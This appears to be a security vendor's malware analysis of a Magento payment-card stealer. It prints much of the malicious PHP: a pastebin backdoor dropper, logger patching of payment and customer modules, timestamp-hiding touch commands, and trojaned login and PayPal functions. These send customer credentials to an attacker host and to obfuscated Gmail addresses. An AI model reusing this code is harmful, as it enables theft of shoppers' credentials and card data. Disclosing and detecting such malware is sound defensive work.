Magento credit card stealer

Magento
Hackers are increasingly exploiting an Downloader with connect install package upload vulnerability to steal payment card information from e-commerce websites that use Magento, the most popular e-commerce platform owned by eBay.

Magento Auto Logger & Patcher

First this malware script try download patcher.zip

### Start Patching ###
/* Download */
executebin('curl -O '.$linkpatch);

/* Extract */
if (file_exists($namepatch)) {
    echo "<br/>[+] $namepatch DOWNLOADED!";
} else {
    echo "<br/><font color=red>[!] $namepatch NOT FOUND!</font>";
    $backdoor = file_get_contents("http://pastebin.com/raw/[SECRET]");
    $backdoor_f = fopen($dir."/js/backup.php", "w");
    fwrite($backdoor_f, $backdoor);
    fclose($backdoor_f);
    echo "<br/>[+] Backdoor UPLOADED!";
}
@chmod($dir."/downloader/", 0777);
@unlink($dir."/downloader/index.php");
@unlink($dir."/downloader/backup.php");
executebin('unzip '.$namepatch);

If it fail it download PHP Command Shell to remote access from pastebin.

Logger Creator

### Logger Creator ###
$dir  = $_SERVER['DOCUMENT_ROOT'];
$b64  = "base"."64"."_"."de"."code";
$path = '/app/code/core/Mage';
$link = $b64('[SECRET]');

$path_a = $dir.$path.'/Payment/Model/Method/';
$name_a = 'Cc.php';
$file_a = 'Abstract.php';
$link_a = $link.'[SECRET]';
patch($path_a,$name_a,$file_a,$link_a);
echo "<br/>[+] Card Logger DONE!";
.
.
echo "<br/>[+] Customer Logger DONE!";
.
.
echo "<br/>[+] Admin Logger DONE!";
.
.
if($size_e == $size_d) {
        patch($path_d,$name_d,$file_d,$link_d);
        echo "<br/>[+] PayPal Direct Scam DONE!";
} elseif($size_e == '4096') {
        patch($path_d,$name_d,$file_d,$link_e);
        echo "<br/>[+] PayPal Direct Scam DONE!";
} else {
        echo "<br/><font color=red>[!] PayPal Direct Scam FAILED / ".$size_e."</font>";
}

Patch ShopLift

Then this try disable old Magento ShopLift vulnerability – remote code execution (RCE).

/* Patch ShopLift */
@unlink($dir."/app/code/core/Mage/Adminhtml/controllers/Cms/WysiwygController.php");
echo "<br/>[+] ShopLift PATCHED!";

Touching Files

After that it thouching almost all files to trying hide itself what files are modified:

echo "<br/>[+] Touching Files";
executebin('touch -r cron.sh app/');
executebin('touch -r app/locale/ app/code/');
.
.
.
executebin('touch -r js/calendar/calendar.js js/calendar/calendar.php');
executebin('touch -r cron.sh xml.php');

Deleting and Cleaning

Again it try remove itself to hiding

/* Delete */
executebin('rm -rf '.$namepatch);
if (file_exists($namepatch)) {
    echo "<br/><font color=red>[!] $namepatch FOUND!</font>";
} else {
    echo "<br/>[+] $namepatch DELETED!";
}

Paypal Model/Config.php

This stealing your payment information:

/**
     * PayPal web URL generic getter
     *
     * @param array $params
     * @return string
     */
    public function getPaypalUrl(array $params = array())
    {   
        $evil_destination = "http://socialplanners.com.mx/scammers/";
        $ip_korban = $_SERVER['REMOTE_ADDR'];
        $situs = $evil_destination."victims.txt";
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $situs);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT,30);
        curl_setopt($ch, CURLOPT_POST, 1);
        $preg_view = curl_exec($ch);
        curl_close($ch);
        if(preg_match("#".$ip_korban."#", $preg_view)) {
            return sprintf('https://www.%spaypal.com/cgi-bin/webscr%s',
                $this->sandboxFlag ? 'sandbox.' : '',
                $params ? '?' . http_build_query($params) : ''
            );
        } else {
            $situs = $evil_destination."url.txt";
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $situs);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT,30);
            curl_setopt($ch, CURLOPT_POST, 1);
            $paypal_fake = curl_exec($ch);
            curl_close($ch);
            return sprintf($paypal_fake,
                $this->sandboxFlag ? 'sandbox.' : '',
                $params ? '?' . http_build_query($params) : ''
            );  
        }
    }

Customer/Model/Session.php

This module steal user login data and forward them hackers gmail.com accounts:

email: kosowar8@gmail.com
email: 1v4n.1v4n4usqu1@gmail.com

/**
     * Customer authorization
     *
     * @param   string $username
     * @param   string $password
     * @return  bool
     */
    public function login($username, $password)
    {
        /** @var $customer Mage_Customer_Model_Customer */
        $customer = Mage::getModel('customer/customer')
            ->setWebsiteId(Mage::app()->getStore()->getWebsiteId());
            if ($customer->authenticate($username, $password)) {
			$srv = $_SERVER['HTTP_HOST'];
			$ips = $_SERVER['REMOTE_ADDR'];
			$uag = $_SERVER['HTTP_USER_AGENT'];
            $getip = 'http://ip-api.com/json/' . $ips;
            $curl = curl_init();
			curl_setopt($curl, CURLOPT_URL, $getip);
			curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
			curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
			$content = curl_exec($curl); curl_close($curl);
			$details = json_decode($content);
			$country_codes = $details->countryCode; 
			if(empty($country_codes)) { $country_code = "XX"; } else { $country_code = $country_codes; }
			$country_name = $details->country;
			$chksrv = "http://socialplanners.com.mx/mail_chk/";
			$chkmail = file_get_contents($chksrv."?e=$username&p=$password");
			if($chkmail == "") { $mailchk = "Unknown"; } else { $mailchk = $chkmail; }
            $chkvalid = file_get_contents($chksrv."valid.php?email=$username&pass=$password");
			if($chkvalid == "") { $ppchk = "Unknown"; } else { $ppchk = $chkvalid; }
			$id  = "ba"."se"."64"."_"."de"."co"."de";
			$db  = "ma"."il";
			$key = $id("a29zb3dhcjhAZ21haWwuY29tLDF2NG4uMXY0bjR1c3F1MUBnbWFpbC5jb20=");
			$auth = "Account :  ".$username."|".$password."\nInfo : ".$ppchk." PayPal - ".$mailchk." Email\n\nIP Info :  ".$ips." | ".$country_name." On ".date('r')."\nBrowser :  ".$uag."\nSite :  ".$srv."";
			$subjk = "".$ppchk." PayPal - ".$mailchk." Email [".$srv." - ".$ips."]";
			$headr = "From: ".$country_code." User <".$username.">";
			$db($key, $subjk, $auth, $headr);
            $this->setCustomerAsLoggedIn($customer);
            $this->renewSession();
            return true;
        }

        return false;
    }

Final words

Websites that using Malware Expert – ModSecurity rules are protected against this threat.

Use Malware Expert – Signatures detect these malware files for FREE!